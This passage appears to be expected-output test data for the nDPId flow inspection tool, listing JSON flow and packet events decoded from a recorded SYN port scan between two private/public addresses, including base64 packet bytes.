+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1008,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsO94AADgG1JSsEAAIQA2GNIzTGiHdU4MZAAAAAGACBAAaawAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1009,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsafYAAC8Gr3ysEAAIQA2GNIzTD4PdU4MZAAAAAGACEAAZCQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/NEAAC8GHKGsEAAIQA2GNIzTwAbdU4MZAAAAAGACEABohQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAs0YEAACUGUfGsEAAIQA2GNIzTRrXdU4MZAAAAAGACCADp1gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsJvQAACcG+n6sEAAIQA2GNIzT\/KjdU4MZAAAAAGACEAAr4wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsu4wAADEGW+asEAAIQA2GNIzTB9ndU4MZAAAAAGACCAAoswAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1014,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsomcAADMGcwusEAAIQA2GNIzTAsHdU4MZAAAAAGACEAAlywAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1015,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsV\/gAADMGvXqsEAAIQA2GNIzTBKLdU4MZAAAAAGACEAAj6gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1016,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAszxkAACsGTlmsEAAIQA2GNIzTbindU4MZAAAAAGACEAC6YgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1017,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1017,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsqCgAACgGeEqsEAAIQA2GNIzTG1rdU4MZAAAAAGACBAAZMgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1018,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsXyMAACgGwU+sEAAIQA2GNIzTbEPdU4MZAAAAAGACBADISAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1019,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsoekAADkGbYmsEAAIQA2GNIzTBBbdU4MZAAAAAGACCAAsdgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1020,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1020,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsYoQAACsGuu6sEAAIQA2GNIzTAAHdU4MZAAAAAGACEAAoiwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1021,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1021,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/nEAACkGIQGsEAAIQA2GNIzTJR7dU4MZAAAAAGACCAALbgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsszoAADkGXDisEAAIQA2GNIzTF2PdU4MZAAAAAGACCAAZKQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1023,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsLiYAADEG6UysEAAIQA2GNIzSBvfdUoMYAAAAAGACCAApmAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1024,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsIwgAAC0G+GqsEAAIQA2GNIzSEV3dUoMYAAAAAGACCAAfMgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1025,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1025,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsbtYAADYGo5ysEAAIQA2GNIzSCU3dUoMYAAAAAGACDAAjQgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsggcAADcGj2usEAAIQA2GNIzSsCzdUoMYAAAAAGACEAB4YgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsi00AADgGhSWsEAAIQA2GNIzSG2vdUoMYAAAAAGACBAAZJAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsjTgAADgGgzqsEAAIQA2GNIzSQmDdUoMYAAAAAGACBADyLgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs2LgAACgGR7qsEAAIQA2GNIzSBJbdUoMYAAAAAGACBAAv+QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsKigAACwG8kqsEAAIQA2GNIzSNdbdUoMYAAAAAGACBAD+uAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAskrkAADsGermsEAAIQA2GNIzSFw7dUoMYAAAAAGACEAARgQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1032,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsqEIAACUGezCsEAAIQA2GNIzSJpbdUoMYAAAAAGACCAAJ+QAAAgQFtA=="} 